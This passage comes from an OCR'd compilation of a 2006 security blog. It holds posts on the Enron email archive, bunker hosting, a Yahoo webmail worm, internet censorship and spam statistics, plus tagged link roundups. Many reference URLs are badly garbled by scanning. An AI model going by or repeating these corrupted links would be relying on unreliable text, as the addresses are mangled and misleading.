the vibrations by slowing down the basics through such laws. 


1. http://news .zdnet .co.uk/internet/security/0 , 39020375, 39273873, 00.htm 
2. http://news.com.com/Australiantpolice+get+go-aheadton+spyware/2100-7348_3-5491671.htm 


2.6.10 There You Go With Your Financial Performance Transparency (2006-06-10 16:57) 


Truly amazing, and the inavitable consequence of communication retention in the financial 
sector, but | feel it’s the [1]magnitude that resulted in [2]Enron’s entire email communication 
achive that’s seems available online right now. 


"[3]Search through more hundreds of thousands of email messages to and from 176 for- 
mer [4]Enron executives and employees from the power-trading operations in 2000-2002. For 
the first time, they are available to the public for free through the easy-to-use interface of the 
[5]/nBoxer Anti-Risk Appliance. [6]Create a free account, and go to work. You can search for 
words, phrases, senders, recipients, and more." 


The interesting part is how their [7]Jex-risk management provider is providing the data, 
in between fighting with the [8]Monsters in Your Mailbox. 


1. tap: /7en. wikipedia, org/ wiki Enron 

2, heap: www earonensit con 

3. hetp: //nedia. snboxer con/antiniakgey heal 

4. http:/ /nevs. boc. co, uk/1/ni/ousiness/1780075. ta 
5. hetp://aw.iaboxer..con/ 

6. http: //nedia. inboxer .con/antiniakgey bea 
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7. bttp://www.inboxer.com/ 
8. http://www. inboxer .com/downloads/Monsters_In_Your_Mailbox. pdf 


2.6.11 Going Deeper Underground (2006-06-10 17:11) 


IT Security Goes Nuclear, at least [1]that’s what they say. 


"Venture capitalists are predicting a “business boom below ground" as blue-chip compa- 
nies turn to nuclear bunkers built at the height of the Cold War in the battle to protect sensitive 
electronic data. The latest private equity investor to move in on the area is Foresight Venture 
Partners, which has just taken a 20 per cent stake in The Bunker Secure Hosting." 


But no matter how [2]deep underground you are, you would still be providing an Inter- 
net connection given you’re a hosting company. That’s an open network, compared to a 
closed one which is more easy to control - [3]thick walls wouldn’t matter when it comes 
to connectivity and insiders. It’s logical for any data to be stated as secure in that type of 
environment, but an authorized/unauthorized "someone"will want to use and abuse it for sure. 


[4]VCs often exagerate to develop a [5]market sector they somehow envision as _ prof- 
itable in the long term, the real issue is that, while the idea is very marketable, you cannon 
base future trends on this fact only. They’d better [6Jinvest in market segments such as 
portable security solutions, or risk management companies such as Vontu and Reconnex, 
which | covered in a previous post related to [7]Jinsiders abuse. 


1 fieep:/Pousness, ineson ine co, uk/arVicle/0,, TS-Z216557 hea 
2. http://www. lyricstreak. com/j/jamiroquai /deeper+underground_20069403 . htm] 

3. http: //ddanchev. blogspot .com/2006/04/would-somebody-please-buy-this-titan-1.htm 
4. stp://evebitpr con/release detail asptfeleaseID={117 

bsp //aaancney,slepeost,con/2006/04/opotcang-eauaab law snr SStaaea a nea 

6 


ttp://ddanchev. blogspot .com/2006/05/valuing-security-and-prioritizing-your.htm 


7. http: //ddanchev. blogspot .com/2005/12/insiders-insights-trends-and-possible.htm 


2.6.12 Travel Without Moving - Georgi Markov’s KGB Assassination Spot 
(2006-06-11 16:15) 


In the spirit of the previous [1]hot spot in the Travel Without Moving series, here’s another 
one, this time [2]Georgi Markov’s KGB Assassination spot. [3]Georgi Markov was [4]killed in 
[5]London, in 1978, using a tiny pellet fired from an [6]Jumbrella containing 0.2 milligram dose 
of poison ricin. 


You may also find this Time Out’s briefing on [7]London’s espionage locations interesting. 
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1. bttp://ddanchev. blogspot . com/2006/06/travel-without-moving-kgb-1ubyanka. htm] 

2. http://maps.google.com/maps?f=q&hl=enkq=Waterloo+Bridge , +SE1&t=k&om=1%11=51 .506312, -0.114584&spn=0.01354 
3. http: //en. wikipedia. org/wiki/Georgi_Markov 

4, http://www... com/2008/WORLD/europe/01/07 /terror. poison. bulgarian/ 

5. http: //news. bbc. co.k/1/hi/uk/2636459. stm 


6. http://en.wikipedia. org/wiki/Image:Markov_umbrella. PN 


7. bttp://www.timeout.com/london/features/340.htm 


2.6.13 It’s Getting Cloudy, and Delicious (2006-06-11 16:31) 


[1]For real. A brief summary of the instant links for the last two days : 


01. [2]Eight Indian Startups to Watch - "Some startups are offering unique solutions for 
India’s burgeoning domestic market, others are targeting global markets. Several are going 
after both. Red Herring has chosen a few below-the-radar young companies that we think are 
worth watching." - to [3]Investing [4]Technology [5]India on june 10 


02. [6]’Grand Theft Auto’ Game Makers Settle With FTC - "A settlement has been reached with 
the companies behind the popular video game "Grand Theft Auto: San Andreas," Take-Two 
Interactive and subsidiary Rockstar Games, which were sued for deceptive practices over 
hidden sexual content in the game." - to [7]Game [8]lnvesting on june 10 


03. [9]Symbian dismisses smartphone security risk - "David Wood, executive vice presi- 
dent of research at Symbian, said on the Symbian website that smartphones only pose a 
security risk if companies ignore basic practical rules." - to [10]Malware [11]Symbian on june 
10 


04. [12]AV management 2006 - "We have assembled a comprehensive range from the 
leading anti-virus products available in today’s market. During our testing, we began by 
checking the capacity of these respective offerings to cope with basic tasks." - to [13]Security 
[14]Malware [15]AntiVirus on june 10 


05. [16]Zero-Day Exploits Abound at Legitimate Web Sites - "An exploit distribution net- 
work controlled by a single organization that was using a network of 40 Internet domains, 
each of which was linked to an average of 500 infected sites, for a total of roughly 20,000 Web 
pages forwarding the groups’ attacks." - to [17]Oday [18]Vulnerabilities on june 10 
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06. [19]Taiwan Faces Increasing Cyber Assaults - "A hacker managed to issue an e-mail 
attachment that contained a fake press release purportedly from the Military Sookesman’s 
Office describing a meeting between People’s First Party representatives and MND officials." - 
to [20]InformationWarfare [21]Cyberwarfare [22]Taiwan [23]China on june 10 


07. [24]Social- and Interactive-Television Applications Based on Real-Time Ambient-Audio 
Identification - "We showed how to sample the ambient sound emitted from a TV and automat- 
ically determine what is being watched from a small signature of the sound—all with complete 
privacy and minuscule effort." - to [25]NewMedia [26]Privacy [27]Surveillance on june 10 


08. [28]The Evolution of In-Game Ads - "Marketed as a way to help game makers increase 
their bottom line or make specific titles more realistic, advertisers are continually searching 
for ways to reach new audiences—young males and beyond."- to [29]Game [30]Advertising ... 
on june 11 


09. [31]Risks of Keeping User Data Outweigh Benefits - "Large data troves are certain 
to become targets of hackers, identity thieves and unscrupulous insiders. As the raft of recent 
data breaches has shown, there are plenty of companies, organizations and government 
agencies that do a lousy job at securing data." - to [32]Security on june 11 


10. [33]Protect Me, Protect My Data - "Companies that underestimate security threats 
to their records do so at their own peril. It can mean a loss of trust and of business." - to 
[34]Security on june 11 


11. [35]Audit finds security weaknesses at NASA center - "The IG’s audit found other 
problems as well. System administrators also accessed a key server containing security 
information without adequate encryption and did not remove unnecessary services from the 
network." - to [36]Security [37]NASA on june 11 


12. [38]America’s Most Stolen Vehicles - "The Cadillac Escalade had the highest theft 
claim rate overall, according to the HLDI, and was the most stolen SUV, according to the CCC 
2004 stolen vehicle report." - to [39]Security [40]Theft on june 11 


13. [41]N Korea in ’US spy plane’ warning - "North Korea says it will punish the US, af- 
ter claiming it is conducting spying flights over its territorial waters." - to [42]Intelligence 
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[43]Reconnaissance on june 11 


14. [44]McAfee SiteAdvisor to add site blocking, extend ratings beyond Web - "McAfee 
is planning enhancements to its recently acquired SiteAdvisor software that will allow the Web- 
rating application to block inappropriate Web sites, offer safety ratings for online transactions 
and rate Web links that appear in e-mail and IM windows. - to [45]McAfee [46]SiteAdvisor on 
june 11 


15. [47]Google and Ebay : The MBA Analysis - "In fact, as they researched the paper 
over the course of the year, the authors came to the conclusion that eBay had no choice but 
to ally with either Yahoo or Microsoft. Then the Journal reported as much, and the Yahoo/eBay 
deal went down." - to [48]NewMedia [49]Google [50]Ebay on june 11 


. http://del.icio.us/DDanchev?settagview=cloud 

. http: //www.redherring.com/article.aspx?a=1712 

. http: //del.icio.us/DDanchev/Investing 

. http://del.icio.us/DDanchev/Technolog 

. http: //del.icio.us/DDanchev/India 

. http: //www.ecommercetimes.com/rsstory/51018.htm 
. http://del.icio.us/DDanchev/Game 

. http: //del.icio.us/DDanchev/Investing 


O ON ADU FWN FH 


. http: //www.vnunet .com/vnunet /news/2157916/symbian-dismisses-smartphone 
10. http://del.icio.us/DDanchev/Malware 

11. http://del.icio.us/DDanchev/Symbia 

12. http://www.scmagazine.com/uk/grouptest/details/ab23b23f-f6b3-51ca-9609-26a657f£c36b7/av+management+2006/ 
13. http://del.icio.us/DDanchev/Securit 

14. http://del.icio.us/DDanchev/Malware 

15. http://del.icio.us/DDanchev/AntiVirus 

16. http://www.eweek.com/article2/0, 1895, 1974779, 00.asp 

17. http://del.icio.us/DDanchev/0da 

18. http://del.icio.us/DDanchev/Vulnerabilities 

19. http://www.defensenews.com/story . php?F=1861031&C=asiapac 
20. http://del.icio.us/DDanchev/InformationWarfare 

21. http://del.icio.us/DDanchev/Cyberwarfare 

22. http://del.icio.us/DDanchev/Taiwa 

23. http://del.icio.us/DDanchev/China 

24. http://www.mangolassi.org/covell/pubs/euroITV-2006. pdf 
25. http://del.icio.us/DDanchev/NewMedia 

26. http://del.icio.us/DDanchev/Privac 

27. http://del.icio.us/DDanchev/Surveillance 

28. http://www.redherring.com/article.aspx?a=1717 

29. http://del.icio.us/DDanchev/Game 

30. http://del.icio.us/DDanchev/Advertising 


31. http://www.ecommercetimes.com/story/WIkqRlxm56uUGb/Risks-of-Keeping-User-Data-Outweigh-Benefits.xhtm 


32. http://del.icio.us/DDanchev/Securit 
33. http://www. businessweek.com/technology/content/jun2006/tc20060608_894982.htm 
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2.6.14 Consolidation, or Startups Popping out Like Mushrooms? (2006-06-13 16:13) 


If technology is the enabler, and the hot commodity these days, spammers will definitely 
twist the concept of targeted marketing, while taking advantage of them. Last week I’ve 
[1]mentioned the concepts of VoIP, WiFi and Cell phone spam that are slowly starting to take 
place. 


Gartner [2]recently expressed a (pricey) opinion on the upcoming [3]consolidation of 
spam vendors, while | feel they totally ignored the technological revolution of spamming to 
come - IPSec is [4]also said to be dead by 2008.. 


"The current glut of anti-spam vendors is about to end, analysts at Gartner said Wednesday. 
But enterprises shouldn’t stay on the sidelines until the shakeout is over. By the end of the 
year, Gartner predicted, the current roster of about 40 vendors in the enterprise anti-spam 
filtering market will shrink to fewer than 10. As consolidation accelerates and as anti-spam 
technology continues to rapidly change, most of today’s vendors will be "left by the wayside," 
said Maurene Caplan Grey, a research director with Gartner, and one of two analysts who 
authored a recently-released report on the state of the anti-spam market." 


The consequence of cheap hardware, HR on demand, angel investors falling from the 
sky on daily basis, and acquiring vendor licensed IP, would result in start ups popping up 
like mushrooms to cover the newly developed market segments, and some will stick it long 
enough not to get acquired given they realize they poses a core competency. 
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Sensor networks, spam traps, bayesian filters, all are holding the front, while we’ve get- 
ting used to "an acceptable level of spam", not the lack of it. What’s emerging for the time 
being is the next logical stage, that’s localized spam on native languages, and believe it or 
not, its gets through the filters, and impacts productivity, the major problem posed by spam. 


[5]SiteAdvisor - | feel I’m almost acting as an evangelist of the idea - [6]recently responded 
to [7]Scandoo’s concept, by wisely starting to take advantage of their growing database, 
and provide the feature in email clients while protecting against phishing attacks. End users 
wouldn’t consider insecure search by default in order to change their googling habits, they 
trust Google more than they would trust an extension, and they’d rather have to worry about 
Google abusing their click stream, compared to anything else. [8]Anti-Phishing toolbars are a 
buzz, and it’s nice to see the way they’re orbiting around it. 


Be a mushroom, don’t look for an umbrella from day one! 


1, it ip://ddanchev. blogspot. con/ 2006/06 /over~perforaing-epamer tal 
2. hevp:/ way. techveb.com/vire/story/TVB20040317S0009 

3. http: //ddanchev. blogspot . com/2006/04/spotting-valuable-investments-in. html 
4, http://adanchev blogspot .con/2006/02/current~state-of~ip- spoofing. heal 

5, http://ddanchev blogspot. con/2006/04/spotting-valuable~investnents~in, hia 
6 

7 

8 


2.6.15 Web Application Email Harvesting Worm (2006-06-13 17:40) 


This is a rare example of a [1]web application vulnerability worm, targeting one of the most 
popular free email providers by harvesting emails within their LGB mailboxes, and of course 
propagating further. 


"Yahoo! on Monday has repaired a vulnerability in its email service that allowed a worm 
to harvest email addresses from a user accounts and further spread itself. The J/S/Yamanner 
worm automatically executes when a user opens the message in the Yahoo Mail service. It 
uses JavaScript to exploit a flaw that until today was unpatched. Yahoo later on Monday 
fixed the vulnerability. "We have taken steps to resolve the issue and protect our users from 
further attacks of this worm. The solution has been automatically distributed to all Yahoo! Mail 
customers, and requires no additional action on the part of the user," Yahoo! spokeswoman 
Kelley Podboy said in an emailed statement." 


Web application worms have the potential to dominate the malware threatscape given 
the amount of traffic their platforms receive, my point is that even within a tiny timeframe like 
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this, one could achieve speed and efficiency like we’ve only seen in single-packet worms. 


In a previous post related to the "[2]Current State of Web Application Worms", you can 
also find more comments and resources on the topic. Rather defensive, the content spoof- 
ing exploiting the trust between the parties that | mentioned is nothing compared to the 
automated harvesting in this case. As there’s naturally active research done in [3]Bluetooth 
honeypots, IM honeypots, [4]ICQ honeypots, [5]Google Hacking honeypots, it’s about time to 
start seeding your spam trap emails within free email providers or social networking providers. 


The stakes are too high not to be exploited in one way or another, | hope we'll some 
day get surprised by a top web property coming up with a fixed vulnerability on their own. 
Realizing the importance of their emerging position as attack vector for malware authors is 
yet another issue to keep in mind. And the best part about web services is their push patching 
approach, you’re always running the latest version, so relaying on end users is totally out of 
the question. 


Find out [6]more [7]details on the worm, [8Jand [9]comments as well. 


UPDATE: Rather active month when it comes web application malware events, another 
[10]Data-Theft Worm Targets Google’s Orkut. 


10. http://blog.spywareguide.com/2006/06/datatheft_worm_targets_googles_1.htm 


2.6.16 No Other Place Like 127.0.0.1 (2006-06-24 04:36) 


Sincere apologies for the sudden disappearance, but thanks for the interest even though | 
haven't been active for the last week due to quality offline activities. No other place like 
127.0.0.1, and the smell of an untouched by human hand, Cold War era postage stamps glue 
on my high value collections - | do own several "stamp anomalies". 
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Collecting [l]postage stamps is a challenging hobby for a teenager to have, mostly be- 
cause of his usually low income, and this rather expensive hobby.The solution in my case back 
then, was bargaining while reselling ancient coins and purchasing postage stamps through the 
margins.While every collection has its story on how | acquired it, perhaps the most important 
thing | realized back then was that, if you don’t respect something, sooner or later you're 
going to lose it to someone with a better attitude towards it. 


Posting will resume shortly, a lot has happened for a week, and the only thing | pretend 
I’m not good at is wasting my time. As a matter of fact, I’ve got some very nice comments out 
of a presentation held at the University of Dresden, Germany, regarding my [2]Future trends 
of malware research. 


1. http://en.wikipedia.org/wiki/Postage_stamp 


2. http: //wwwse.inf.tu-dresden.de/wiki/images/f/£6/PRO-TimLackorzynski .pdf 


2.6.17 Travel Without Moving - Erasmus Bridge (2006-06-25 18:33) 


Catching up with last week’s [1]Travel Without Moving shot, [2]this one isn’t intelligence of 
military related, but a marvelous engineering achievement, [3]Erasmus Bridge - perhaps 
the perfect moment to demonstrate my amateur photographer skills while tripping around. 
| will definitely share more shots from cons and life, the way | experience it, anytime now. 
And meanwhile, you can take a peek at the latest addition to the [4]Eyeball Series, the 
[5]North Korean Missile Launch Furor - catching up with a [6]conventional weaponry doctrine 
is anything else but a milestone. 


Google Earth and Google Maps continue making the headlines as [7]Ja "threat" to national 
security, where the key points remain the balancing of satellite reconnaissance capabilities 
between developed and developing nations, the freshness of the data, and it’s [8]quality. 
Sensitive locations can indeed be spotted, and then again, so what? And, with [9]the 
[10]launch of Geoportail.fr the French government aims at achieving transparency, rather 
than [11]loverhyping this common sense "insecurity". 


1. http: //ddanchev blogspot .con/2006/06/ravel-vithout-noving-georgi-aarkove hal 

2. http: //maps.google.com/maps?f=qkhl=enkq=Erasmus+Bridge&ie=UTF8kamp ; amp; t=-k&om=0&11=51.909107 , 4.48667&spn=0. 
"tp: //en. wikipedia. org/viki/Erasmus_ Bridge 

cep: //wiy.eyeball-series..org/ 

_ ct: //eryptone. org/dprk- furor /apric eyeball. ta 


ttp://ddanchev.blogspot.com/2006/02/who-needs-nuclear-weapons-anymore .htm 
ttp://ddanchev. blogspot .com/2006/04/threat-by-google-earth-has- just .htm 


ttp://www.informationweek.com/software/showArticle. jhtml?articleID=189500473&subSection=Enterpriset+tAppli 


ations 


ONoau sp Ww 


o 


ttp://www.wired.com/news/technology/internet/0,71234-0.html?tw=wn_technology_1 


10. http://edition.cnn.com/2006/TECH/internet/06/23/france.google.earth. reut/index.htm 
11. http://www.csmonitor.com/2005/1201/p13s01-stct.htm 
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2.6.18 Delicious Information Warfare - 13/24 June (2006-06-25 19:41) 


Brief summaries of key events for the last week and a half, catch up with [1]previous ones as 
well. | intend to continue sharing my daily reads while emphasizing on the big picture, and 
emerging trends. [2]Great quote courtesy of the The Royal Swedish Academy of War Sciences 
: “The world isn’t run by weapons anymore, or energy, or money. It’s run by little ones and 
zeros, little bits of data. It’s all just electrons. . . . There’s a war out there. . . and it’s not 
about who’s got the most bullets. It’s about who controls the information. What we see and 
hear, how we work, what we think, it’s all about information.” 


01. [3]Eyeballing North Korean Missile Launch Furor - "Latest satellite photo coverage 
and description of the launch site facilities." to [4]Military [5]Satellite [6]Reconnaissance 
[7]GEOINT ... on 25 June 


02. [8]VoIP wiretapping could lead to more problems - "Requiring Internet service providers to 
respond in real time to requests for them to record VoIP calls would open up the Internet to 
new vulnerabilities, Whitfield Diffie added." to [9]Intelligence [10]Terrorism [11]Wiretapping 
[12]CALEA [13]VoIP on 25 June 


03. [14]Police arrest two in Japan data theft case - "Blackmailers attempted to extort al- 
most $90,000 from one of Japan’s largest phone companies by threatening to reveal a leak 
of private data belonging to four million customers before a major shareholder meeting." to 
[15]Espionage [16]Insider [17]Investing on 25 June 


04. [18]Kevin Mitnick, the great pretender - "ZDNet UK caught up with the ex-cracker to 
discuss developments in social engineering, new U.S. laws monitoring telephone systems 
and alleged "NASA hacker" Gary McKinnon’s impending extradition to the United States." to 
[19]Security [20]Interview on 25 June 


05. [21]Data-Theft Worm Targets Google’s Orkut - "Now, however, the infection will pop 
up a message telling you your data is being mailed off someplace, before sending you to the 
Orkut site." to [22]Malware [23]Web on 25 June 


06. [24]French Microsoft Web site hacked - "Hackers on Sunday broke into a part of Mi- 
crosoft’s French Web site, replacing the front page with online graffiti." to [25]Hacktivism 
[26]Microsoft [27]Defacement on 25 June 
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07. [28]SCADA industry debates flaw disclosure - "The guys who are setting up these 
systems are not security professionals. And many of the systems that are running SCADA 
applications were not designed to be secure-it’s a hacker’s playground." 


to [29]Security [30]SCADA [31]Cyberterrorism [32]Vulnerabilities on 25 June 


08. [33]Details emerge on second potential NSA facility - "The room had a sophisticated 
set of double security doors, known as a "mantrap," and any engineer who worked inside 
required extensive security clearances." to [34]Intelligence [35]NSA [36]Terrorism [37]Surveil- 
lance [38]Wiretapping on 25 June 


09. [39]Next-Gen Bank Trojans Are Upon Us - "The 3G Banking Trojan can steal your info and 
then siphon your account of its cash. The 3G Banking Trojan began with the "Win32.Grams" 
piece of malware, which first appeared in 2004."to [40]Malware on 25 June 


10. [41]Malware authors eyeing Web-based applications - "As Web-based services grow 
increasingly popular, industry experts say users should brace for more of these threats." to 
[42 ]Malware [43]Web on 25 June 


11. [44]Stratcom leads DOD cyberdefense efforts - “Unfortunately for us, cyberterrorism 
is cheap, and it’s fast,” Kehler said. “Today’s terrorist moves at the speed of information.” to 
[45 ]Defense [46]InformationWarfare [47]Cyberterrorism on 25 June 


12. [48]Text Messaging Used as Malware Lure - "Botnet herders have found a crafty 
new way to lure computer users to maliciously rigged Web sites—via text messaging on cell 
phones." to [49]Malware [50]Mobile on 25 June 


13. [51]Two China Search Sites Shut - "Censorship or maintenance? That’s the question 
after two Chinese search engines shut down temporarily." to [52]China [53]Censorship 
[54]FreeSpeech on 25 June 


14. [55]Web services increasingly under attack - "As larger audiences flock to Web sites 
that run on ever more powerful programming scripts, malware writers are them fertile 
ground." to [56]Security [57]Malware [58]Web on 25 June 
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15. [59]What’s the Endpoint of Endpoint Security? - "Finally, there’s a more manipula- 
tive progenitor of new jargon: the analyst community. White papers, market reports and 
mystical squares can get crowded, and the big vendors often dominate them." 


to [60]Security [61]Investing [62]Advertising [63]Leadership on 25 June 


16. [64]Expatriates in Canada pressured to spy - "Despite strong warnings from the gov- 
ernment of Canada, certain countries continue to use their intelligence services to manipulate 
and exploit expatriate communities in Canada," CSIS said." to [65]Intelligence [66]OSINT 
[67]Espionage on 25 June 


17. [68]Review: Terror On The Internet - "Terror on the Internet" usefully outlines the 
basic contours of his subject, giving a taste of Al Qaeda’s Internet rhetoric and strategies, 
along with those of less well-known militant groups from Colombia to the Basque country to 
Chechnya." to [69]InformationWarfare [70]Cyberterrorism [71]Terrorism [72]PSYOPS on 25 
June 


18. [73]Web of terror - "The suspects reportedly became radicalized through militant 
Web sites and received online advice from Younis Tsouli, the Britain-based Webmaster for 
Islamic extremist sites who called himself "Terrorist 007," before he was arrested late last 
year." to [74]InformationWarfare [75]Cyberterrorism [76]Terrorism [77]PSYOPS [78]Web on 
25 June 


. http: //ddanchev. blogspot .com/2006/06/its-getting-cloudy-and-delicious.htm 


ttp://www.slis.indiana.edu/news/story.php?story_id=549 


. http: //cryptome. org/dprk-furor/dprk-eyeball .ht 


1 

2 

3, heep://erypeone.org/dprk-furor/aprk-eyeball. ht 

4, http://del.icio us/DDanchev/Histary 

5, http: //del. icio.us/DDanchev/Satellitd 

6, http: //del. icio.us/DDanchey/Reconnaissance 

7. netp://del. icko.us/DDanchev/ GEOINT 

8. heep://awy. eechvor14. con/security/nevs/inden, cfu?aevs D-O21Sepagtype=al] 
9, http://del icio us/DDanchev/Intel1 Agence 


. http: //www.techworld.com/security/news/index.cfm?newsID=6213&pagt ype=al 
. http://del.icio.us/DDanchev/Intelligence 


15. http://del.icio.us/DDanchev/Espionage 
16. http://del.icio.us/DDanchev/Inside 
17. http://del.icio.us/DDanchev/Investing 


20. http://del.icio.us/DDanchev/Intervie 

21. http://blog.spywareguide.com/2006/06/datatheft_worm_targets_googles_1.htm 

22. http://del.icio.us/DDanchev/Malware 

23. http://del.icio.us/DDanchev/Web 

24. http://news .com.com/2100-7349_3-6085589.htm 

25. http://del.icio.us/DDanchev/Hacktivism 

26. http://del.icio.us/DDanchev/Microsoft 

27. http://del.icio.us/DDanchev/Defacement 

28. http://www. securityfocus.com/news/11396 

29. http://del.icio.us/DDanchev/Securit 

30. http://del.icio.us/DDanchev/SCADA 

31. http://del.icio.us/DDanchev/Cyberterrorism 

32. http://del.icio.us/DDanchev/Vulnerabilities 

33. http://www. securityfocus.com/brief/234 

34. http://del.icio.us/DDanchev/Intelligence 

35. http://del.icio.us/DDanchev/NSA 

36. http://del.icio.us/DDanchev/Terroris 

37. http://del.icio.us/DDanchev/Surveillance 

38. http://del.icio.us/DDanchev/Wiretapping 

39. http://www. internetnews.com/security/article. php/3615631 

40. http://del.icio.us/DDanchev/Malware 
ttp://searchsecurity.techtarget .com/originalContent/0, 289142,sid14_gci1195528,00.html 


42. 

43. 

44. 
45. http://del.icio.us/DDanchev/Defense 

46. 
47. 


ttp://www.eweek.com/article2/0, 1759, 1980932, 00. asp?kc=EWRSS03129TX1K0000614 


49. 
50. 
. http://www.redherring.com/Article.aspx?a=17315khed=TwotChinatSearch+Sites+Shut 
52. 
53. 
54. 


ttp://www.businessweek.com/ap/financialnews/D8IE2SCG1.htm?sub=apn_tech_up&chan=tc 
56. http://del.icio.us/DDanchev/Securit 
57. http://del.icio.us/DDanchev/Malware 
58. http://del.icio.us/DDanchev/Web 
59. http://www. csoonline.com/alarmed/ 
60. http://del.icio.us/DDanchev/Securit 
61. http://del.icio.us/DDanchev/Investing 
62. http://del.icio.us/DDanchev/Advertising 
63. http://del.icio.us/DDanchev/Leadership 
64. http://news.scotsman.com/latest .cfm?id=921822006 
65. http://del.icio.us/DDanchev/Intelligence 
66. http://del.icio.us/DDanchev/OSIN 
67. http://del.icio.us/DDanchev/Espionage 
68. http://www. iht .com/articles/2006/06/23/arts/idbriefs24c. php 
69. http://del.icio.us/DDanchev/InformationWarfare 
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70, 
72. 

73. 
75, 

76. 

78. 


2.6.19 World’s Internet Censorship Map (2006-06-26 00:16) 


While it seems rather quiet on the [1]lnternet’s censorship front, the media coverage on the 
topic represents a cyclical buzz that reemerges with the time. 


Thankfully, initiatives as the [2]OpenNet one, and organizations such as [3]Reporters 
Without Borders never stop being the society’s true watchdogs when it comes to Internet 
censorship. ONI’s neat [4]visualization of the Internet filtering map is a great way of pin 
pointing key locations, and provide further details through their [5]in-depth reports, take a 
look for yourself! 


Censorship is capable of [6]running entire governments, maintaining [7]historical politi- 
cal power, and mostly ruling by "[8]excluding the middle". Recently, two of [9]China’s leading 
Internet portals were shut down due to maintenance issues acting as the excuse for improving 
their filtering capabilities. Reporters Without Borders conducted an [10]outstanding analysis 
of the situation, coming to the conclusion "that the search engines of China’s two leading 
Internet portals, [11]Sina and [12]Sohu, after they were shut down from 19 to 21 June for 
what they described as a “technical upgrade” but which in fact was designed to improve the 
filtering of their search results." 


What is Google up to? Making [13]business compromises in order to harness the power 
of the growing Chinese Internet population. And while [14]the Wall is cracking from within, the 
world is also taking actions against the fact that there’re currently [15]30 journalists behind 
bars in China. 


1. http://www. google. com/trends?q=Censorship 
. http://www. opennetinitiative.net/ 
. http://www.rsf.org/ 


http: //opennet .net/map/ 


ttp://www. opennetinitiative.net/modules .php?op=modload&name=Archive&f ile=indexkreq=viewarticlekartid=1 


. http: //ddanchev. blogspot .com/2006/04/securing-political-investments-through. htm 
. http: //ddanchev. blogspot .com/2006/02/chinese-internet-censorship-efforts.htm 


ttp://www.cjr.org/issues/2006/3/schulman.asp 


2 
3 
4 
5. 
6 
7 
8 
9 


ttp://www.redherring.com/Article.aspx?a=17315éhed=TwotChinatSearch+Sites+Shut 
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10. 

11. 

12. 

13. 
14. 


ttp://www.interfax.cn/showfeature.asp?aid=13850&s1lug=INTERNET- CENSORSHIP 


http://www. sina. com.cn/ 
http://www. sohu. com/ 


2.6.20 Big Brother in the Restroom (2006-06-26 01:09) 


Wikes! This is nasty, and while the porn industry has commercialized the idea a long time 
ago, | never imagined the levels of crime in public restrooms would "reach" levels requiring 
CCTVs to be installed - if there’s so much vandalism going on in public restrooms, these will 
definitely get stolen as well, picture the situation! [1]Norway installs surveillance cameras in 
park restrooms. 


Hint : once you get involved in the [2]CCTV irony, | say irony mainly because the dude 
behind the 40 motion detection and face recognition wall is having another CCTV behind 
his back, you end up spending tax payers money to cover "blind spots", and end up with a 
negative ROI while trying to achieve self-regulation, if one matters! 


[3]Surveillance and Society’s journal still remains the most resourceful publication on 
surveillance studies and its impact on society. 


Further reading and previous cases: 
[4]The Hidden Camera 


[5]lowa Judge Says Hidden Restroom Camera Case Can Proceed to Trial 


: 
2 

3. 

4 
: , 7 


ttp://www.insurance journal .com/news/midwest/2006/05/23/68750.htm 


2.6.21 Dealing with Spam - The O’Reilly.com Way (2006-06-26 15:23) 
While China feels that centralization is the core of everything, and is [1]licensing the use of 


mail servers to fight spam, thus totally ignoring the [2]evolution of spam techniques, the other 
day | came across to some recent [3]Spam Statistics from Oreilly.com - scary numbers! 
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"Our mail servers accepted 1,438,909 connections, attempting to deliver 1,677,649 messages. 
We rejected 1,629,900 messages and accepted only 47,749 messages. That’s a ratio of 1:34 
accepted to rejected messages! Here is how the message rejections break down: 


Bad HELO syntax: 393284 

Sending mail server masquerades as our mail server: 126513 
Rejected dictionary attacks: 22567 

Rejected by SORBS black list: 262967 

Rejected by SpamHaus black list: 342495 
Rejected by local block list: 5717 

Sender verify failed: 4525 

Recipient verify failed (bad To: address): 287457 
Attempted to relay: 5857 

No subject: 176 

Bad header syntax: O 

Spam rejected (score => 10): 42069 
Viruses/malware rejected: 2575 


Bad attachments rejected: 1594" 


Draw up the conclusions for yourself, besides shooting into the dark or general syntax 
errors, total waste of email traffic resulting in delayed email is the biggest downsize here, 
thankfully, non-commercial methods are still capable of dealing with the problem. At the 
bottom line, sending a couple of million email messages on the cost of anything, and getting a 
minor response from a "Hey this is hell of a deal and has my username on the top of it!" type 
of end users seems to keep on motivating the sender. Localized spam is much more effective 
as an idea, but much easier to trace compared to mass-marketing approaches, though | feel 
it would emerge with the time. 


Browse through [4]Spamlinks.net for anything anti-spam related, quite an amazing resource. 
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1. http: //ddanchev. blogspot .com/2006/04/fighting-internets-email-junk-through. html 


2. http: //ddanchev. blogspot . com/2006/06/over-performing- spammer. htm 


3. http://radar.oreilly.com/archives/2006/06/spam_filtering statistics_from.htm 


4. http://spamlinks .net/ 


2.6.22 Shots From the Wild - Terrorism Information Awareness Program Demo Portal 
(2006-06-27 03:54) 


A lot has changed since my last post on "[1]Data mining, terrorism and security", namely 
[2]NSA’s warrantless surveillance efforts. So, in the spirit of a [3]second possible NSA facility, 
I’ve decided to post a shot from the [4]TIA’s early stages of development obtained though the 
most detailed, conceptual, and from a developer’s point of view [5]description of the program. 


There’ve also been speculations on the severity of NSA wiretapping program compared 
to the [6]Watergate scenario, while | feel that besides political engineering through [7 ]infowar, 
it also occurs relatively more often over a juicy barbecue. 


Related resources on [8]Intelligence, [9]NSA, [10]Surveillance, [11]Wiretapping. 


ttp://ddanchev. blogspot .com/2006/03/data-mining-terrorism-and-security.htm 


ttp://en.wikipedia.org/wiki/NSA_warrantless_surveillance_controvers 


. http: //www.securityfocus.com/brief/234 
. http://en.wikipedia. org/wiki/Total_Information_Awareness 


1 
2 
3 
4 
5. http://www.epic.org/privacy/profiling/tia/tiasystemdescription. pdf 
6 
7 
8 
9 


ttp://www.wired.com/news/technology/0,71227-0.html?tw=wn_technology_1 


. http://photos1. blogger .com/blogger/1933/1779/1600/information_warfare.1.gif 
. http://del.icio.us/DDanchev/Intelligence 


ttp://del.icio.us/DDanchev/NSA 
10. http://del.icio.us/DDanchev/Surveillance 
11. http://del.icio.us/DDanchev/Wiretapping 


2.6.23 Malicious Web Crawling (2006-06-27 17:34) 


SiteAdvisor indeed cashed for [1]evaluating the maliciosness of the web, and New Zealand 
feels that [2]nation wide google hacking initiatives are a more feasible solution to the problem 
of google hacking, compared to the Catawba County Schools Board of Education who blamed 
[3]Google for indexing student test scores & social security numbers. It’s like having a just- 
